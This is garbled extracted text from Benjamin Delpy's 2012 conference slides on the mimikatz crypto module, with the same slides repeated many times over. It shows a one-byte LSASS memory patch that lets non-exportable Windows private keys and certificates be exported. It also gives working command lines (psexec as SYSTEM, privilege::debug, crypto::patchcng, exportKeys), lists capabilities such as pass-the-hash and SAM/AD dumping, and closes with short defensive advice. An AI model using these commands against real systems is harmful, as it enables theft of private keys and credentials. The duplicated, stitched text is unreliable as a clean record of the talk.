Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
